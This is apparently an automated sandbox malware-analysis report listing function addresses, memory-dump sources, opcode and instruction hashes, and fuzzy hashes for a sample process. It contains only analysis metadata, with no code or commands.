                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
                                        • Instruction ID: 1a3838d8456dcac49b6f7152c5fec1b23c5d37dbccb05f7809e6364e319b60c6
                                        • Opcode Fuzzy Hash: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
                                        • Instruction Fuzzy Hash: E2115E30918A4D8FCF85EF68C858AE97BF0FF28305F0101AAD458D72A1D734A554CB80
                                        Function 00007FFD9BAF6139 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 619 7ffd9baf6139-7ffd9baf6177 620 7ffd9baf6179 619->620 621 7ffd9baf617e-7ffd9baf619a 619->621 620->621 622 7ffd9baf61a0-7ffd9baf61ad 621->622
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
                                        • Instruction ID: 8dd9773d4b4babcbbe5bb6505858c94d0d6b602230966c788fe18a1d62f0943d
                                        • Opcode Fuzzy Hash: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
                                        • Instruction Fuzzy Hash: FD113C30918A8D8FCF85EF68C858AEA7BF0FF29305F0501AAD458D72A1D734A554CB80
                                        Function 00007FFD9BAA4DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        • Opcode ID: f2254f9ead2ee30bec50176606ae15c97c07f6d0ff88faea91a0696af2107216
                                        • Instruction ID: b771ed9da5845a03a03c27af25b51cc0a588824aa2b077d9698169aa4e10c939
                                        • Opcode Fuzzy Hash: f2254f9ead2ee30bec50176606ae15c97c07f6d0ff88faea91a0696af2107216
                                        • Instruction Fuzzy Hash: 1D112830E059698FEB74DB18CC547E9B7B2EF94316F1082E6D40DE62A5DE782A818F40
                                        Function 00007FFD9BAF6CE9 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 646 7ffd9baf6ce9-7ffd9baf6d1f 647 7ffd9baf6d26-7ffd9baf6d3e 646->647 648 7ffd9baf6d21 646->648 649 7ffd9baf6d44-7ffd9baf6d51 647->649 648->647
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
                                        • Instruction ID: 63150d81c31e2e708df19dffdffb29aadd694bbd5f915c9c379b92cbba5a924c
                                        • Opcode Fuzzy Hash: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
                                        • Instruction Fuzzy Hash: EB012130918A8D8FCF85EF68C858AEA7FF0FF25305F4545AAD418D72A2D7749554CB80
                                        Function 00007FFD9BAF4DF9 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
                                        • Instruction ID: 0a119fdc2c713f1d57631e19edb310183b4d903380b8800d7ba5bb02715da474
                                        • Opcode Fuzzy Hash: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
                                        • Instruction Fuzzy Hash: DFF0C260A1E78D9FEB61AB6088696E87FA0AF05301F4941FBD44CC60E3DA386244C712
                                        Function 00007FFD9BB0CE40 Relevance: .3, Instructions: 319COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baff000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b1495ecdf4f6d4fab358102e270a50cc7a2156d79f43e9db107401cc23950e4
                                        • Instruction ID: 7f5be492584fb5c93080f58929806354597d103cff5ee6c4bf26ff54c8e6e2e0
                                        • Opcode Fuzzy Hash: 7b1495ecdf4f6d4fab358102e270a50cc7a2156d79f43e9db107401cc23950e4
                                        • Instruction Fuzzy Hash: 78C13C70A19A5D8FDBA4EB58C8A57F8B3B1FF58304F4141E9D44DD32A6CE346A818B40
                                        Function 00007FFD9BB0CDFD Relevance: .3, Instructions: 287COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baff000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f4660c5cd465e062939f66b48d91baa38888f29c5c5d21fcc671a5453d24cd3
                                        • Instruction ID: 9768abc1489cf220258137ced1b80911f55af4a94d948eb653c7c484baf148aa
                                        • Opcode Fuzzy Hash: 5f4660c5cd465e062939f66b48d91baa38888f29c5c5d21fcc671a5453d24cd3
                                        • Instruction Fuzzy Hash: 4CB11B30A19A5D8FDBA4EB58C8A57F8B3B1FF58304F5541A9D44DD32E6CE346A80CB41
                                        Function 00007FFD9BADFC79 Relevance: .2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4908c6ffd87c0d97bee18255d580f0288f7122a311e0762f16abf8980a797992
                                        • Instruction ID: a2e3a20f86cf0aa7f6ca4dc12c631ebf17067be206fc484a0545ee728f596cca
                                        • Opcode Fuzzy Hash: 4908c6ffd87c0d97bee18255d580f0288f7122a311e0762f16abf8980a797992
                                        • Instruction Fuzzy Hash: 73910C71E0995D8FDBA8EF58C8A5BA977B2FF58300F4041A6D40DD7295CA34AD85CF40
                                        Function 00007FFD9BAEBD6D Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 324a323168143b59b87e9206f3f675f05fb56f62cb010033d90544c13f2925d5
                                        • Instruction ID: 2448ba510fe8a4617d06f2e09175abe1a117015bceaa624189fc7952bd1d84be
                                        • Opcode Fuzzy Hash: 324a323168143b59b87e9206f3f675f05fb56f62cb010033d90544c13f2925d5
                                        • Instruction Fuzzy Hash: C351AE30E0D65D8FEB64DB88D8A96ECB7A1FF59310F4541BAD00DD32A1CEB46A84CB41
                                        Function 00007FFD9BAB9079 Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
                                        • Instruction ID: 031e4c92cdecdc4e0951c729cb268430161a9ff9933eff04a1a6a518209addb1
                                        • Opcode Fuzzy Hash: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
                                        • Instruction Fuzzy Hash: 6751A030A09A4D9FCF84EF98D898AED7BF1FF58310F0501A6E419E7261D674E990CB90
                                        Function 00007FFD9BAFD80E Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d90166e36d6e1b7744cbcc5b5345fbe98d2d10583e7b54d81236c30bd42b52a5
                                        • Instruction ID: 732a12618d4d73ae147865eea1a182d0ee2d10da5cd4bde492e8daf1bf70d106
                                        • Opcode Fuzzy Hash: d90166e36d6e1b7744cbcc5b5345fbe98d2d10583e7b54d81236c30bd42b52a5
                                        • Instruction Fuzzy Hash: 8A315071E09B5D4FDBA8DF8C84A97ACBBE1FB68341F04016DD04CE7692DA756840CB40
                                        Function 00007FFD9BAFBB84 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 370012d5dca34e624751baa8796431528803b9d38954408c3ccac8b5f9d0cc7e
                                        • Instruction ID: 10d23c5015990811876cc4c82848aa3395cf3c4ff5165d7dfa9bb260c15052a3
                                        • Opcode Fuzzy Hash: 370012d5dca34e624751baa8796431528803b9d38954408c3ccac8b5f9d0cc7e
                                        • Instruction Fuzzy Hash: 8731F971A0A61D8EEBA4DB5489A57E9BBB1EB58340F5101BAC00DD32A1DF746A828B00
                                        Function 00007FFD9BAB8D09 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67a3762c78dd1e78f049aa4b0db4dcccddfe56cace4cebbae7d5612a7f19e1c6
                                        • Instruction ID: 1e3ca780c7f843594b3b3ef79ed25a2bb3f05c919048572fb3eeee5f480069d2
                                        • Opcode Fuzzy Hash: 67a3762c78dd1e78f049aa4b0db4dcccddfe56cace4cebbae7d5612a7f19e1c6
                                        • Instruction Fuzzy Hash: 3D31BF30A0964D8FCF54DF58C494AED7BF1FF58314F06026AE849E32A1CB34A940CB90
                                        Function 00007FFD9BABFE50 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0570dd1ef334c9ef6af67288e9fae8f4e2f75988833ce1787dfae6ca10b11fed
                                        • Instruction ID: 71049d5d31e8b1995467203532d4097c098f2f91b2775942da5b7fe1ca5078d8
                                        • Opcode Fuzzy Hash: 0570dd1ef334c9ef6af67288e9fae8f4e2f75988833ce1787dfae6ca10b11fed
                                        • Instruction Fuzzy Hash: 7E31346244E3C94FD7138B748CB16E17FB0AF13200F0A46DBD4C48B0E3D2285A1AC722
                                        Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 743e7d9e77ab35ef1087bc085749f8b53c9991d6c4e33c882df25c6a65b718c6
                                        • Instruction ID: 20e6a141840396fe85ef7294421777aa24a5ae67af0f5841ae2379fbb65ec78d
                                        • Opcode Fuzzy Hash: 743e7d9e77ab35ef1087bc085749f8b53c9991d6c4e33c882df25c6a65b718c6
                                        • Instruction Fuzzy Hash: CF212875B0E28E4FE3329BA8CC212ED7B61EF82714F0605B7C1589B1E3C6781609C765
                                        Function 00007FFD9BAA5F11 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0505c8a29e0fef752378e0e1dc022c451a5fb15fc3dd851acc5f71ce1fd7441
                                        • Instruction ID: 4725a43a08d934223d94d64aefeefe92bbce934359e71746560d670a6248c5d7
                                        • Opcode Fuzzy Hash: e0505c8a29e0fef752378e0e1dc022c451a5fb15fc3dd851acc5f71ce1fd7441
                                        • Instruction Fuzzy Hash: A3319570E0D62D8EEBB9DF55C8687E8B6B1FB14301F4140E9D40DA22A1CBB86AC4CF15
                                        Function 00007FFD9BABD279 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bcd3dea9c759263a6a28376ebbd8ba755f86a76d28772f7832ab51b66b77356
                                        • Instruction ID: ee8dcf8097e4d07239356f2c44eeaa5a18830095f5079c6dbdc30ccf94dce921
                                        • Opcode Fuzzy Hash: 9bcd3dea9c759263a6a28376ebbd8ba755f86a76d28772f7832ab51b66b77356
                                        • Instruction Fuzzy Hash: 5A215171E0A51D8BEBE8DB58C8A1AE873B1FF54314F4002B9D02D972A6CE35A981CF40
                                        Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08a23ec06f3f0bc10ff78ba078a8340391b11c22417649480a3e09acf9d2c92c
                                        • Instruction ID: 8fa9b38215a505cb0dfeab615e75ac439c381e66d5a3faa1e8f57a0f77b0b72a
                                        • Opcode Fuzzy Hash: 08a23ec06f3f0bc10ff78ba078a8340391b11c22417649480a3e09acf9d2c92c
                                        • Instruction Fuzzy Hash: 71112B35B0E68D4FE722AFA4C8212E97B71EF82710F0545B3D158DB1E3DA781609C7A5
                                        Function 00007FFD9BAF7580 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a978308afe32edb1b668a431258e3a31b963fadee0140995c11c14159a1f5bfa
                                        • Instruction ID: 22d93b026760624a22b5a88ba22d608ea4e6c2ed3dd980067ddee0dfa560dcc7
                                        • Opcode Fuzzy Hash: a978308afe32edb1b668a431258e3a31b963fadee0140995c11c14159a1f5bfa
                                        • Instruction Fuzzy Hash: 46210E70F1AA1D8EEBE4DB9888557ECBBE1FF58300F1581B5C40DA31A1DA746DC18B40
                                        Function 00007FFD9BAFA9A1 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 014db1d8ef5299b0e66a5bcff05811881904aec1301d9cdadfdf42361f81f97e
                                        • Instruction ID: 8e0c296962741c048c3a4345818e837e6409a77561184ed17a3e3ed597906a8c
                                        • Opcode Fuzzy Hash: 014db1d8ef5299b0e66a5bcff05811881904aec1301d9cdadfdf42361f81f97e
                                        • Instruction Fuzzy Hash: C2211831F0921D8FEB64EB98C998AED7BF1EF18300F144175D409D3291DA786A868B00
                                        Function 00007FFD9BAA5D16 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab8e0b7e1f5f5f92a63a4c013c800203c677291b77320fe0a3da7f7b4ae19c96
                                        • Instruction ID: e270aadea08967bd259b010581f18b18627f12729288d6000ddda23c126e7dce
                                        • Opcode Fuzzy Hash: ab8e0b7e1f5f5f92a63a4c013c800203c677291b77320fe0a3da7f7b4ae19c96
                                        • Instruction Fuzzy Hash: 0821B770E0A62E9EDBB4DF55C8643E9B6F2FB14301F1140F9D40DA26A1DBB86B848F15
                                        Function 00007FFD9BAED0D9 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 275dca9fba57584db033e6118d0ac828800e4fa4353bb9bafcba1883d5538619
                                        • Instruction ID: b41790f377b4c07a26c3c86f41684a50dbf06b5b11f12174dcf2961e44ac27dc
                                        • Opcode Fuzzy Hash: 275dca9fba57584db033e6118d0ac828800e4fa4353bb9bafcba1883d5538619
                                        • Instruction Fuzzy Hash: 7511FB7091878D8FCB45EF68C855AE97BF0FF69305F0501ABE849D72A1D734A950CB81
                                        Function 00007FFD9BAA5D1B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction ID: a52343fdd2da07bfadbc9395f9b1b736b4cb722690c5ed012e9b8404960fb592
                                        • Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction Fuzzy Hash: F221B670E1A22E8EDBB4DF65C8587A8B6F1FB14301F4140F9D40DA22A1DB786B84DF14
                                        Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e20c0a6e458dafcf4a29f8bdf750e7d329a0da42d23e05be75b66ff9cb6d043
                                        • Instruction ID: 382f6df0eb8c1ed649771cc26a1289223704b815976b0103f1a16457d8717465
                                        • Opcode Fuzzy Hash: 8e20c0a6e458dafcf4a29f8bdf750e7d329a0da42d23e05be75b66ff9cb6d043
                                        • Instruction Fuzzy Hash: 74110675A0E28D8FE722AFA4C8242E97B71EF42310F0545B7D059DB1E3CA782619C765
                                        Function 00007FFD9BAFBC90 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d2776f701722347d0fdeba2cfa2e518cf1c9f60d1ccb8f0bdb12c1fe3a094d4
                                        • Instruction ID: 34cf2bfe88c2e31b634e772e7e34a3eedeb032a89117e99d1274a25218381205
                                        • Opcode Fuzzy Hash: 7d2776f701722347d0fdeba2cfa2e518cf1c9f60d1ccb8f0bdb12c1fe3a094d4
                                        • Instruction Fuzzy Hash: EA217730A0561D8FDBA4EB54C894BE9BBB1FB58300F5545AAC40DE72A1DF746AC5CB40
                                        Function 00007FFD9BAC0672 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7981162a550c084d3c10833ea54958592ece977f1c565fcddf918992cc55cb1
                                        • Instruction ID: 04a10f8522df26a4a0edbc87cf2710e2b7ffeac90c6bca5c5026bffea899ee9c
                                        • Opcode Fuzzy Hash: a7981162a550c084d3c10833ea54958592ece977f1c565fcddf918992cc55cb1
                                        • Instruction Fuzzy Hash: 5F114C3090968D8FCF45EF68C8589EA7FF0FF69304F0145AAE448D71A1D7349554CB81
                                        Function 00007FFD9BAEBB10 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f36060e4bafa2a910a3276a36576f24af063f24fc0fd9249717d2669a2fd7251
                                        • Instruction ID: 7757d9ab80c08968aca261585bdc67d54eee35fb7da00e2d92fd7ca9bb3a1b6a
                                        • Opcode Fuzzy Hash: f36060e4bafa2a910a3276a36576f24af063f24fc0fd9249717d2669a2fd7251
                                        • Instruction Fuzzy Hash: 6A11C970914A4D8FDF84EF58C859AEE7BF1FB68305F10052AE859D3250DB71E590CB81
                                        Function 00007FFD9BAB86FD Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5958cad5d317b9cd8fc8adf3ea20f2b3497557485cff78e9914ac0ab4b9a4aa9
                                        • Instruction ID: bb392b33b2ca6655293be89054e79f88c2351cf5df8c3b58a6921a48bb182f04
                                        • Opcode Fuzzy Hash: 5958cad5d317b9cd8fc8adf3ea20f2b3497557485cff78e9914ac0ab4b9a4aa9
                                        • Instruction Fuzzy Hash: 85014932E0E68D4FE7509B58D8651FCBBE0EF45324F420176D51C831D6CE781249CB41
                                        Function 00007FFD9BC62799 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2024714342.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bc60000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9e1d1a819d4ef12541721636eab73a391e5170f0091df878b71399b2a03fa64
                                        • Instruction ID: 012dd4ff5e4a35c8090618f6359d72cd07f70128e37f7b5d388d28dfe40c08c8
                                        • Opcode Fuzzy Hash: e9e1d1a819d4ef12541721636eab73a391e5170f0091df878b71399b2a03fa64
                                        • Instruction Fuzzy Hash: D9118E3090968DCFCB85DF68C8549EE7BF0FF29300F0505AAE859C71A1DB34AA54CB81
                                        Function 00007FFD9BAD9F19 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0e431de01890397017ee19ece007832f3cd7d9982f19d8c82ca2855dc724cce
                                        • Instruction ID: 9f446e39fdfaa80309356083e178b90d4332ec29e9c151ed5de5a7710b825657
